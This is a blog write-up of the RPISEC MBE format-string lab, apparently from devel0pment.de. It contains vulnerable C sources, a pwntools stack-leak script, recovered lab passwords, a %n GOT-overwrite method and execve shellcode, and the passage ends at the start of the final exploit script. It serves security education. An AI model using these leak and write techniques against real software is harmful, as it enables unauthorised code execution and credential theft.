{"id":351,"date":"2018-02-07T08:42:06","date_gmt":"2018-02-07T08:42:06","guid":{"rendered":"https:\/\/devel0pment.de\/?p=351"},"modified":"2018-05-20T19:52:58","modified_gmt":"2018-05-20T19:52:58","slug":"rpisec-mbe-writeup-lab04-format-strings","status":"publish","type":"post","link":"https:\/\/devel0pment.de\/?p=351","title":{"rendered":"RPISEC\/MBE: writeup lab04 (Format Strings)"},"content":{"rendered":"<p>In the last lab, which writeup can be found <a href=\"https:\/\/devel0pment.de\/?p=317\">here<\/a>, we used publicly available shellcodes as well as shellcodes we had to write on our own, in order to exploit the provided binaries. In this writeup we proceed with the next lab, which focuses on the subject of <i>Format Strings<\/i>.<\/p>\n<p>As usual there are three levels ranging from C to A:<br \/>\n&#8211;&gt; <a href=\"https:\/\/devel0pment.de\/?p=351#lab4C\">lab4C<\/a><br \/>\n&#8211;&gt; <a href=\"https:\/\/devel0pment.de\/?p=351#lab4B\">lab4B<\/a><br \/>\n&#8211;&gt; <a href=\"https:\/\/devel0pment.de\/?p=351#lab4A\">lab4A<\/a><\/p>\n<p><!--more--><\/p>\n<hr \/>\n<h1 id=\"lab4C\">lab4C<\/h1>\n<p>We start by connecting to the first level of lab04 using the credentials <span style=\"color: #ff0000;\">lab4C<\/span> with the password <span style=\"color: #ff0000;\">lab04start<\/span>:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\ngameadmin@warzone:~$ sudo ssh lab4C@localhost\r\nlab4C@localhost's password: (lab04start)\r\n        ____________________.___  _____________________________\r\n        \\______   \\______   \\   |\/   _____\/\\_   _____\/\\_   ___ \\\r\n         |       _\/|     ___\/   |\\_____  \\  |    __)_ \/    \\  \\\/\r\n         |    |   \\|    |   |   |\/        \\ |        \\\\     \\____\r\n         |____|_  \/|____|   |___\/_______  \/\/_______  \/ \\______  \/\r\n                \\\/                      \\\/         \\\/         \\\/\r\n __      __  _____ ____________________________    _______  ___________\r\n\/  \\    \/  \\\/  _  \\\\______   \\____    \/\\_____  \\   \\      \\ \\_   _____\/\r\n\\   \\\/\\\/   \/  \/_\\  \\|       _\/ \/     \/  \/   |   \\  \/   |   \\ |    __)_\r\n \\        \/    |    \\    |   \\\/     \/_ \/    |    \\\/    |    \\|        \\\r\n  \\__\/\\  \/\\____|__  \/____|_  \/_______ \\\\_______  \/\\____|__  \/_______  \/\r\n       \\\/         \\\/       \\\/        \\\/        \\\/         \\\/        \\\/\r\n\r\n        --------------------------------------------------------\r\n\r\n                       Challenges are in \/levels\r\n                   Passwords are in \/home\/lab*\/.pass\r\n            You can create files or work directories in \/tmp\r\n\r\n         -----------------&#x5B; contact@rpis.ec ]-----------------\r\n\r\nLast login: Sat Jan 27 06:07:38 2018 from localhost\r\n<\/pre>\n<p>Like in the last labs we have access to the source code of each level:<\/p>\n<pre class=\"brush: cpp; first-line: 0; gutter: false; highlight: [22,29,45,46,47,50,51,52,57,61]; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/levels\/lab04$ cat lab4C.c\r\n\/*\r\n *   Format String Lab - C Problem\r\n *   gcc -z execstack -z norelro -fno-stack-protector -o lab4C lab4C.c\r\n *\/\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;string.h&gt;\r\n#include &lt;unistd.h&gt;\r\n\r\n#define PASS_LEN 30\r\n\r\nint main(int argc, char *argv&#x5B;])\r\n{\r\n    char username&#x5B;100] = {0};\r\n    char real_pass&#x5B;PASS_LEN] = {0};\r\n    char in_pass&#x5B;100] = {0};\r\n    FILE *pass_file = NULL;\r\n    int rsize = 0;\r\n\r\n    \/* open the password file *\/\r\n    pass_file = fopen(&quot;\/home\/lab4B\/.pass&quot;, &quot;r&quot;);\r\n    if (pass_file == NULL) {\r\n        fprintf(stderr, &quot;ERROR: failed to open password file\\n&quot;);\r\n        exit(EXIT_FAILURE);\r\n    }\r\n\r\n    \/* read the contents of the password file *\/\r\n    rsize = fread(real_pass, 1, PASS_LEN, pass_file);\r\n    real_pass&#x5B;strcspn(real_pass, &quot;\\n&quot;)] = '&#92;&#48;';  \/\/ strip \\n\r\n    if (rsize != PASS_LEN) {\r\n        fprintf(stderr, &quot;ERROR: failed to read password file\\n&quot;);\r\n        exit(EXIT_FAILURE);\r\n    }\r\n\r\n    \/* close the password file *\/\r\n    fclose(pass_file);\r\n\r\n    puts(&quot;===== &#x5B; Secure Access System v1.0 ] =====&quot;);\r\n    puts(&quot;-----------------------------------------&quot;);\r\n    puts(&quot;- You must login to access this system. -&quot;);\r\n    puts(&quot;-----------------------------------------&quot;);\r\n\r\n    \/* read username securely *\/\r\n    printf(&quot;--&#x5B; Username: &quot;);\r\n    fgets(username, 100, stdin);\r\n    username&#x5B;strcspn(username, &quot;\\n&quot;)] = '&#92;&#48;';    \/\/ strip \\n\r\n\r\n    \/* read input password securely *\/\r\n    printf(&quot;--&#x5B; Password: &quot;);\r\n    fgets(in_pass, sizeof(in_pass), stdin);\r\n    in_pass&#x5B;strcspn(in_pass, &quot;\\n&quot;)] = '&#92;&#48;';      \/\/ strip \\n\r\n\r\n    puts(&quot;-----------------------------------------&quot;);\r\n\r\n    \/* log the user in if the password is correct *\/\r\n    if(!strncmp(real_pass, in_pass, PASS_LEN)){\r\n        printf(&quot;Greetings, %s!\\n&quot;, username);\r\n        system(&quot;\/bin\/sh&quot;);\r\n    } else {\r\n        printf(username);\r\n        printf(&quot; does not have access!\\n&quot;);\r\n        exit(EXIT_FAILURE);\r\n    }\r\n\r\n    return EXIT_SUCCESS;\r\n}\r\n<\/pre>\n<p>What does the program do?<br \/>\n&#8211;> The file <code>\/home\/lab4B\/.pass<\/code> is opened (line 22).<br \/>\n&#8211;> It&#8217;s contents are stored in a buffer called <code>real_pass<\/code> (line 29).<br \/>\n&#8211;> The user can input a username (lines 45-47) and a password (lines 50-52).<br \/>\n&#8211;> If the password matches the real password (line 57), a shell is spawned (line 59).<br \/>\n&#8211;> If the password does not match, <code>printf<\/code> is called with <code>username<\/code> (line 61).<\/p>\n<p>As we already know because of the lab&#8217;s subject we are looking for some kind of format string vulnerability. A lot of c-functions (for example <code>printf<\/code>, <code>fprintf<\/code> and <code>snprintf<\/code>) use format strings. The count of arguments passed to those functions is variable:<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\r\nchar username&#x5B;] = &quot;admin&quot;;\r\nint id = 1337;\r\nprintf(&quot;hello %s, your id is: %d\\n&quot;, username, id);\r\n<\/pre>\n<p>In the example above, three arguments are passed to the function:<\/p>\n<ol>\n<li>The format string: <code>\"hello %s, your id is: %d\\n\"<\/code><\/li>\n<li>A string: <code>username<\/code><\/li>\n<li>An integer: <code>id<\/code><\/li>\n<\/ol>\n<p>The function <code>printf<\/code> simply processes the format string looking for format specifiers. When a format specifier is found, it takes the first element following the format string on the stack and inserts this element in the format string according to the chosen format specifier. When the next format specifier is found, the second element from the stack is inserted:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_01.png\" alt=\"\" width=\"756\" height=\"793\" class=\"alignnone size-full wp-image-358\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_01.png 756w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_01-286x300.png 286w\" sizes=\"(max-width: 706px) 89vw, (max-width: 767px) 82vw, 740px\" \/><\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/tmp$ .\/example\r\nhello admin, your id is: 1337\r\n<\/pre>\n<p>If there would be another format specifier within the format string, the function would simply take the next element on the stack:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_02.png\" alt=\"\" width=\"831\" height=\"264\" class=\"alignnone size-full wp-image-359\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_02.png 831w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_02-300x95.png 300w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_02-768x244.png 768w\" sizes=\"(max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/p>\n<p>When we can control the format string, we can insert format specifiers which will leak elements stored on the stack.<\/p>\n<p>In the code above on line 61 <code>printf<\/code> is called with the first argument (the format string) being a string the user provided (<code>username<\/code>). Thus we can use the username to leak items on the stack:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/levels\/lab04$ .\/lab4C\r\n===== &#x5B; Secure Access System v1.0 ] =====\r\n-----------------------------------------\r\n- You must login to access this system. -\r\n-----------------------------------------\r\n--&#x5B; Username: test%d\r\n--&#x5B; Password: test\r\n-----------------------------------------\r\ntest-1073744446 does not have access!\r\nlab4C@warzone:\/levels\/lab04$\r\n<\/pre>\n<p>After entering <code>test<b>%d<\/b><\/code> <code>printf<\/code> expects the next item on the stack to be an integer and inserts it into the string: <code>test<b>-1073744446<\/b><\/code>.<\/p>\n<p>As we already know, the password we are looking for is kindly stored in a local variable on the stack (<code>real_pass<\/code>). Thus we only need to leak enough items from the stack until the password is read.<\/p>\n<p>Very hand for this task is the argument selector <code>$<\/code>. With <code>$<\/code> the argument to be printed can be selected by its location on the stack:<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\r\n#include &lt;stdio.h&gt;\r\n\r\nint main() {\r\n  char c1 = 'A';\r\n  char c2 = 'B';\r\n  char c3 = 'C';\r\n  \r\n  printf(&quot;%2$c %3$c %1$c\\n&quot;, c1, c2, c3);\r\n  \r\n  return 0;\r\n}\r\n<\/pre>\n<p>Running this example will print <code>B<\/code>, <code>C<\/code>, <code>A<\/code> instead of <code>A<\/code>, <code>B<\/code>, <code>C<\/code>:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/levels\/lab04$ .\/example2\r\nB C A\r\n<\/pre>\n<p>Because the local variable <code>username<\/code> is limited to 100 bytes we can write a python-script which iterates over all items on the stack running the program multiple times:<\/p>\n<pre class=\"brush: python; first-line: 0; highlight: [8,10]; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/levels\/lab04$ cat \/tmp\/exploit_lab4C.py\r\nfrom pwn import *\r\n\r\nfor i in range(1, 40, 10):\r\n  p = process(&quot;.\/lab4C&quot;)\r\n  line = &quot;&quot;\r\n  for j in range(10):\r\n    line += &quot;%&quot;+str(i+j)+&quot;$08x &quot;\r\n\r\n  p.sendline(line)\r\n  p.sendline(&quot;pass&quot;)\r\n  print(p.recv(2000))\r\n<\/pre>\n<p>The script runs the program 4 times, passing an format string (line 8, line 10) which prints 10 items on the stack each time. The format specifier <code>%n$08x<\/code> prints the n-th item on the stack as an hex-value (<code>x<\/code>) padded with leading zeros to fit 8 characters (<code>08<\/code>):<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/levels\/lab04$ python \/tmp\/exploit_lab4C.py\r\n&#x5B;+] Starting program '.\/lab4C': Done\r\n&#x5B;*] Program '.\/lab4C' stopped with exit code 1\r\n===== &#x5B; Secure Access System v1.0 ] =====\r\n-----------------------------------------\r\n- You must login to access this system. -\r\n-----------------------------------------\r\n--&#x5B; Username: --&#x5B; Password: -----------------------------------------\r\nbffff5c2 0000001e 0804a008 61700000 00007373 00000000 00000000 00000000 00000000 00000000  does not have access!\r\n\r\n&#x5B;+] Starting program '.\/lab4C': Done\r\n&#x5B;*] Program '.\/lab4C' stopped with exit code 1\r\n===== &#x5B; Secure Access System v1.0 ] =====\r\n-----------------------------------------\r\n- You must login to access this system. -\r\n-----------------------------------------\r\n--&#x5B; Username: --&#x5B; Password: -----------------------------------------\r\n00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000  does not have access!\r\n\r\n&#x5B;+] Starting program '.\/lab4C': Done\r\n&#x5B;*] Program '.\/lab4C' stopped with exit code 1\r\n===== &#x5B; Secure Access System v1.0 ] =====\r\n-----------------------------------------\r\n- You must login to access this system. -\r\n-----------------------------------------\r\n--&#x5B; Username: --&#x5B; Password: -----------------------------------------\r\n00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 75620000 74315f37  does not have access!\r\n\r\n&#x5B;+] Starting program '.\/lab4C': Done\r\n&#x5B;*] Program '.\/lab4C' stopped with exit code 1\r\n===== &#x5B; Secure Access System v1.0 ] =====\r\n-----------------------------------------\r\n- You must login to access this system. -\r\n-----------------------------------------\r\n--&#x5B; Username: --&#x5B; Password: -----------------------------------------\r\n7334775f 625f376e 33745572 7230665f 62343363 00216531 24313325 20783830 24323325 20783830  does not have access!\r\n\r\n<\/pre>\n<p>We only need to extract the password from the local variable <code>real_pass<\/code> now. The output from the last two calls looks like ASCII:<\/p>\n<pre>\r\n00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 <span style=\"color:#ff0000;\">75620000 74315f37<\/span>  does not have access!\r\n<span style=\"color:#ff0000;\">7334775f 625f376e 33745572 7230665f 62343363 <u>00<\/u>216531<\/span> 24313325 20783830 24323325 20783830  does not have access!\r\n<\/pre>\n<p>In the second line there is a null-byte terminating the string. The following python-script contains the concatenated bytes and converts these bytes from little endian to the final string:<\/p>\n<pre class=\"brush: python; first-line: 0; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/levels\/lab04$ cat \/tmp\/convertPwd_lab4C.py\r\n\r\npwd_le = &quot;7562000074315f377334775f625f376e337455727230665f6234336300216531&quot;\r\n\r\npwd  = &quot;&quot;\r\n\r\nfor i in range(0, len(pwd_le), 8):\r\n  # the 4 byte values are stored in little endian\r\n  pwd += pwd_le&#x5B;i+6:i+8] + pwd_le&#x5B;i+4:i+6] + pwd_le&#x5B;i+2:i+4] + pwd_le&#x5B;i:i+2]\r\n\r\nprint(pwd)\r\nprint(pwd.decode(&quot;hex&quot;))\r\n<\/pre>\n<p>Running the script yields the password:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4C@warzone:\/levels\/lab04$ python \/tmp\/create_lab4C.py\r\n00006275375f31745f7734736e375f62725574335f6630726333346231652100\r\nbu7_1t_w4sn7_brUt3_f0rc34b1e!\r\n<\/pre>\n<p>Done \ud83d\ude42 The password for the next level is <code>bu7_1t_w4sn7_brUt3_f0rc34b1e!<\/code>.<\/p>\n<p>We could use these credentials as the password input for the program in order to get a shell, but the password is all we need for now \ud83d\ude09<\/p>\n<hr \/>\n<h1 id=\"lab4B\">lab4B<\/h1>\n<p>We connecting to the next level using the previously gained credentials <span style=\"color: #ff0000;\">lab4B<\/span> with the password <span style=\"color: #ff0000;\">bu7_1t_w4sn7_brUt3_f0rc34b1e!<\/span>:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\ngameadmin@warzone:~$ sudo ssh lab4B@localhost\r\nlab4B@localhost's password: (bu7_1t_w4sn7_brUt3_f0rc34b1e!)\r\n        ____________________.___  _____________________________\r\n        \\______   \\______   \\   |\/   _____\/\\_   _____\/\\_   ___ \\\r\n         |       _\/|     ___\/   |\\_____  \\  |    __)_ \/    \\  \\\/\r\n         |    |   \\|    |   |   |\/        \\ |        \\\\     \\____\r\n         |____|_  \/|____|   |___\/_______  \/\/_______  \/ \\______  \/\r\n                \\\/                      \\\/         \\\/         \\\/\r\n __      __  _____ ____________________________    _______  ___________\r\n\/  \\    \/  \\\/  _  \\\\______   \\____    \/\\_____  \\   \\      \\ \\_   _____\/\r\n\\   \\\/\\\/   \/  \/_\\  \\|       _\/ \/     \/  \/   |   \\  \/   |   \\ |    __)_\r\n \\        \/    |    \\    |   \\\/     \/_ \/    |    \\\/    |    \\|        \\\r\n  \\__\/\\  \/\\____|__  \/____|_  \/_______ \\\\_______  \/\\____|__  \/_______  \/\r\n       \\\/         \\\/       \\\/        \\\/        \\\/         \\\/        \\\/\r\n\r\n        --------------------------------------------------------\r\n\r\n                       Challenges are in \/levels\r\n                   Passwords are in \/home\/lab*\/.pass\r\n            You can create files or work directories in \/tmp\r\n\r\n         -----------------&#x5B; contact@rpis.ec ]-----------------\r\nLast login: Sun Jan 21 15:08:34 2018 from localhost\r\n<\/pre>\n<p>And start analysing the provided source code:<\/p>\n<pre class=\"brush: cpp; first-line: 0; highlight: [15,18,19,20,23]; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/levels\/lab04$ cat lab4B.c\r\n\/*\r\n *   Format String Lab - B Problem\r\n *   gcc -z execstack -z norelro -fno-stack-protector -o lab4B lab4B.c\r\n *\/\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;string.h&gt;\r\n\r\nint main(int argc, char *argv&#x5B;])\r\n{\r\n    int i = 0;\r\n    char buf&#x5B;100];\r\n\r\n    \/* read user input securely *\/\r\n    fgets(buf, 100, stdin);\r\n\r\n    \/* convert string to lowercase *\/\r\n    for (i = 0; i &lt; strlen(buf); i++)\r\n        if (buf&#x5B;i] &gt;= 'A' &amp;&amp; buf&#x5B;i] &lt;= 'Z')\r\n            buf&#x5B;i] = buf&#x5B;i] ^ 0x20;\r\n\r\n    \/* print out our nice and new lowercase string *\/\r\n    printf(buf);\r\n\r\n    exit(EXIT_SUCCESS);\r\n    return EXIT_FAILURE;\r\n}\r\n<\/pre>\n<p>What does the program do?<br \/>\n&#8211;> On line 15 <code>fgets<\/code> is called, reading 100 bytes into a local variable called <code>buf<\/code>.<br \/>\n&#8211;> In the for-loop on lines 18-20 all upper-case characters are converted to lower-case.<br \/>\n&#8211;> The adjusted user input is printed using <code>printf<\/code> (line 23).<\/p>\n<p>As well as in the last level we control a string which is passed as a format string to <code>printf<\/code>. This time the string is converted to lower-case before being passed to <code>printf<\/code>, but that should not do too much harm. The main difference compared to the last level is that the password we are looking for is unfortunately not stored in a local variable on the stack. Thus we cannot just leak the password.<\/p>\n<p>In order to exploit the program another handy feature of format strings come into play: the format specifier <code>%n<\/code>. When placed in a format string <code>%n<\/code> will put the number of bytes printed so far in the variable passed as an argument on the stack:<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\r\n#include &lt;stdio.h&gt;\r\n\r\nint main() {\r\n  unsigned int len = 0;\r\n  \r\n  printf(&quot;testing with%n n-specifier\\n&quot;, &amp;len);\r\n  \r\n  printf(&quot;bytes printed by last printf so far: %d\\n&quot;, len);\r\n  \r\n  return 0;\r\n  \r\n}\r\n<\/pre>\n<p>Running the example:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/tmp$ .\/example\r\ntesting with n-specifier\r\nbytes printed by last printf so far: 12\r\n<\/pre>\n<p>As we can see, the value <code>12<\/code> is written to the local variable <code>len<\/code>. <code>12<\/code> is the amount of characters being printed before the <code>%n<\/code> specifier: <code>len(\"testing with\") = 12<\/code>.<\/p>\n<p>This format specifier can be abused to write arbitrary data to an arbitrary address! We will get to this later.<\/p>\n<p>At first we need to know where on the stack the buffer we can write to (<code>buf<\/code>) is located. This can be done by putting a pattern into the buffer, followed by a few format specifiers which leaks the stack:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/levels\/lab04$ .\/lab4B\r\naaaa.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\r\naaaa.00000064.b7fcdc20.00000000.bffff704.bffff678.61616161.3830252e.30252e78.252e7838\r\n<\/pre>\n<p>The input begins with <code>aaaa<\/code> which equals <code>61616161<\/code> in hex. As we can see, the 6th item on the stack is the beginning of our buffer. We can verify this by using the argument selector:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/levels\/lab04$ .\/lab4B\r\naaaa.%6$08x\r\naaaa.61616161\r\n<\/pre>\n<p>Thus the arguments on the stack looks like this when <code>printf<\/code> is entered:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_03.png\" alt=\"\" width=\"453\" height=\"340\" class=\"alignnone size-full wp-image-360\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_03.png 453w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_03-300x225.png 300w\" sizes=\"(max-width: 453px) 100vw, 453px\" \/><\/p>\n<p>As the stack is executable and we control a long enough buffer (100 byte), we can store a shellcode in this buffer. In lab03 we executed our shellcode by overwriting the return address on the stack. Reconsider the last lines of the source code:<\/p>\n<pre class=\"brush: cpp; first-line: 26; title: ; notranslate\" title=\"\">\r\n    exit(EXIT_SUCCESS);\r\n    return EXIT_FAILURE;\r\n}\r\n<\/pre>\n<p>Before the <code>main<\/code> function returns <code>exit<\/code> is called. This will directly terminate the program and the <code>return<\/code> instruction never gets reached. Thus our shellcode gets not executed if we overwrite the return address. We have to write the address of our shellcode somewhere else.<\/p>\n<p>In this case we can use the function call to <code>exit<\/code> in order to redirect the control flow. We do not want to get in the details for now. All you need to know is that function calls are made through the Procedure Linkage Table (PLT), which references the Global Offset Table (GOT):<\/p>\n<pre class=\"brush: bash; gutter: false; highlight: [1,10,13,17]; title: ; notranslate\" title=\"\">\r\n&#x5B;0x08048590]&gt; pdf @ main\r\n\u2552 (fcn) sym.main 276\r\n\u2502           ; DATA XREF from 0x080485a7 (entry0)\r\n\u2502           ;-- main:\r\n\u2502           ;-- sym.main:\r\n\u2502           0x0804868d    55             push ebp\r\n\u2502           0x0804868e    89e5           mov ebp, esp\r\n...\r\n\u2502           0x08048729    c70424000000.  mov dword &#x5B;esp], 0\r\n\u2502           0x08048730    e82bfeffff     call sym.imp.exit ;sym.imp.exit()\r\n...\r\n\r\n&#x5B;0x080486a4]&gt; pdf @ sym.imp.exit\r\n\u2552 (fcn) sym.imp.exit 6\r\n\u2502          ; CALL XREF from 0x08048730 (sym.main)\r\n\u2502          ;-- sym.imp.exit:\r\n\u2502          0x08048560    ff25b8990408   jmp dword &#x5B;reloc.exit_184]     ; &quot;f...v.......&quot; @ 0x80499b8\r\n&#x5B;0x080486a4]&gt;\r\n<\/pre>\n<p>As we can see in the output above, <code>exit<\/code> is called with the symbol <code>sym.imp.exit<\/code> (<code>0x08048560<\/code>). This address is the <code>exit<\/code> entry within the PLT and contains a jump to the address stored at <code>reloc.exit_184<\/code>, which is the GOT entry of <code>exit<\/code>. This means that, when <code>exit<\/code> is called, the execution will proceed at the address stored at <code>reloc.exit_184<\/code> (<code>0x80499b8<\/code>).<\/p>\n<p>If we write the address of our shellcode to that address, our shellcode will be executed when the function <code>exit<\/code> is called.<\/p>\n<p>Summing it up we need to the following:<br \/>\n&#8211;> Store a shellcode in the buffer.<br \/>\n&#8211;> Abuse the <code>%n<\/code> specifier to write the address of our shellcode to the GOT entry of <code>exit<\/code>.<\/p>\n<h2>shellcode<\/h2>\n<p>Basically we can reuse the shellcode from lab03 which makes a <code>sys_execve<\/code> syscall passing <code>\/bin\/sh<\/code> as argument.<\/p>\n<p>One point we have to consider is that the string we enter is converted to lower-case before being passed to <code>printf<\/code>. Thus our shellcode cannot contain bytes between <code>0x41<\/code> (<code>A<\/code>) and <code>0x5A<\/code> (<code>Z<\/code>). So we have to adjust the shellcode we used a little bit:<\/p>\n<pre class=\"brush: cpp; highlight: [2,3,4]; title: ; notranslate\" title=\"\">\r\n31 c0                 xor    eax, eax\r\n;50                    push   eax\r\n83 ec 04              sub    esp, 0x4\r\n89 04 24              mov    &#x5B;esp], eax\r\n68 2f 2f 73 68        push   0x68732f2f\r\n68 2f 62 69 6e        push   0x6e69622f\r\n89 e3                 mov    ebx, esp\r\n89 c1                 mov    ecx, eax\r\n89 c2                 mov    edx, eax\r\nb0 0b                 mov    al, 0xb\r\ncd 80                 int    0x80\r\n31 c0                 xor    eax, eax\r\n40                    inc    eax\r\ncd 80                 int    0x80\r\n<\/pre>\n<p>The instruction <code>push eax<\/code> (<code>0x50<\/code>) would be converted to lower-case and thus be destroyed. As there are plenty ways of doing things on x86 we can simply replace this instruction with two new instructions: <code>sub esp, 0x4<\/code> and <code>mov [esp], eax<\/code>. This will do the same as <code>push eax<\/code>.<\/p>\n<h2>%n specifier<\/h2>\n<p>As I have already mentioned, the <code>%n<\/code> specifier can be used to write arbitrary data to an arbitrary address. We will now see how this works and use this to write the address of our shellcode in the GOT entry of <code>exit<\/code>.<\/p>\n<p>In the example earlier in this writeup, we have seen that <code>%n<\/code> expects an address to an unsigned integer and writes the count of characters printed so far to this address. As we have also seen, we can use the argument selector <code>$<\/code> to select a specific argument. If the string we entered contains the address, we want to write to, we can simply select this address with argument selector <code>$<\/code> and write the count of printed characters so far with the <code>%n<\/code> specifier.<\/p>\n<p>So for now we can write to an arbitrary address. But how do we control what value we write? Since the count of characters printed are written, we must simply print as much characters as our value should be. This can be done easily by using the padding mechanism of a format string, we already used: the format specifier <code>%8x<\/code> pads the value to 8 characters. If we use <code>%1000x<\/code> the value is padded to 1000 characters.<\/p>\n<p>We already determined the address where we want to write to (the GOT entry of <code>exit<\/code>): <code>0x80499b8<\/code>.<\/p>\n<p>We still need the address of our shellcode (the address of <code>buf<\/code> on the stack):<\/p>\n<pre class=\"brush: bash; gutter: false; highlight: [1,3,10,11,16]; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/levels\/lab04$ gdb lab4B\r\nReading symbols from lab4B...(no debugging symbols found)...done.\r\ngdb-peda$ disassemble main\r\nDump of assembler code for function main:\r\n   0x0804868d &lt;+0&gt;:     push   ebp\r\n   0x0804868e &lt;+1&gt;:     mov    ebp,esp\r\n   0x08048690 &lt;+3&gt;:     push   ebx\r\n   ...\r\n   0x080486b0 &lt;+35&gt;:    lea    eax,&#x5B;esp+0x18]\r\n   0x080486b4 &lt;+39&gt;:    mov    DWORD PTR &#x5B;esp],eax\r\n   0x080486b7 &lt;+42&gt;:    call   0x8048540 &lt;fgets@plt&gt;\r\n   ...\r\n   0x08048729 &lt;+156&gt;:   mov    DWORD PTR &#x5B;esp],0x0\r\n   0x08048730 &lt;+163&gt;:   call   0x8048560 &lt;exit@plt&gt;\r\nEnd of assembler dump.\r\ngdb-peda$ b *main+42\r\nBreakpoint 1 at 0x80486b7\r\n<\/pre>\n<p>As the buffer <code>buf<\/code> is passed as an argument to <code>fgets<\/code> we simply set a breakpoint before the call and inspect the stack when the breakpoint is hit:<\/p>\n<pre class=\"brush: bash; gutter: false; highlight: [1,18,28]; title: ; notranslate\" title=\"\">\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab04\/lab4B\r\n&#x5B;----------------------------------registers-----------------------------------]\r\nEAX: 0xbffff6a8 --&gt; 0xbffff6c0 --&gt; 0xffffffff\r\nEBX: 0xb7fcd000 --&gt; 0x1a9da8\r\nECX: 0x859c4868\r\nEDX: 0xbffff744 --&gt; 0xb7fcd000 --&gt; 0x1a9da8\r\nESI: 0x0\r\nEDI: 0x0\r\nEBP: 0xbffff718 --&gt; 0x0\r\nESP: 0xbffff690 --&gt; 0xbffff6a8 --&gt; 0xbffff6c0 --&gt; 0xffffffff\r\nEIP: 0x80486b7 (&lt;main+42&gt;:      call   0x8048540 &lt;fgets@plt&gt;)\r\nEFLAGS: 0x287 (CARRY PARITY adjust zero SIGN trap INTERRUPT direction overflow)\r\n&#x5B;-------------------------------------code-------------------------------------]\r\n   0x80486a8 &lt;main+27&gt;: mov    DWORD PTR &#x5B;esp+0x4],0x64\r\n   0x80486b0 &lt;main+35&gt;: lea    eax,&#x5B;esp+0x18]\r\n   0x80486b4 &lt;main+39&gt;: mov    DWORD PTR &#x5B;esp],eax\r\n=&gt; 0x80486b7 &lt;main+42&gt;: call   0x8048540 &lt;fgets@plt&gt;\r\n   0x80486bc &lt;main+47&gt;: mov    DWORD PTR &#x5B;esp+0x7c],0x0\r\n   0x80486c4 &lt;main+55&gt;: jmp    0x8048709 &lt;main+124&gt;\r\n   0x80486c6 &lt;main+57&gt;: lea    edx,&#x5B;esp+0x18]\r\n   0x80486ca &lt;main+61&gt;: mov    eax,DWORD PTR &#x5B;esp+0x7c]\r\nGuessed arguments:\r\narg&#x5B;0]: 0xbffff6a8 --&gt; 0xbffff6c0 --&gt; 0xffffffff\r\narg&#x5B;1]: 0x64 ('d')\r\narg&#x5B;2]: 0xb7fcdc20 --&gt; 0xfbad2088\r\n&#x5B;------------------------------------stack-------------------------------------]\r\n0000| 0xbffff690 --&gt; 0xbffff6a8 --&gt; 0xbffff6c0 --&gt; 0xffffffff\r\n0004| 0xbffff694 --&gt; 0x64 ('d')\r\n0008| 0xbffff698 --&gt; 0xb7fcdc20 --&gt; 0xfbad2088\r\n0012| 0xbffff69c --&gt; 0x0\r\n0016| 0xbffff6a0 --&gt; 0xbffff754 --&gt; 0xbde68c78\r\n0020| 0xbffff6a4 --&gt; 0xbffff6c8 --&gt; 0xb7e2fbf8 --&gt; 0x2aa0\r\n0024| 0xbffff6a8 --&gt; 0xbffff6c0 --&gt; 0xffffffff\r\n0028| 0xbffff6ac --&gt; 0x80483a9 (&quot;__libc_start_main&quot;)\r\n&#x5B;------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x080486b7 in main ()\r\ngdb-peda$\r\n<\/pre>\n<p>The address <code>0xbffff6a8<\/code> is on top of the stack. This will be the address where we store our shellcode. Nevertheless we must remember that this address may vary when directly running the binary without <code>gdb<\/code>.<\/p>\n<p>Finally we can write a python-script which will create the input to the program:<\/p>\n<pre class=\"brush: python; 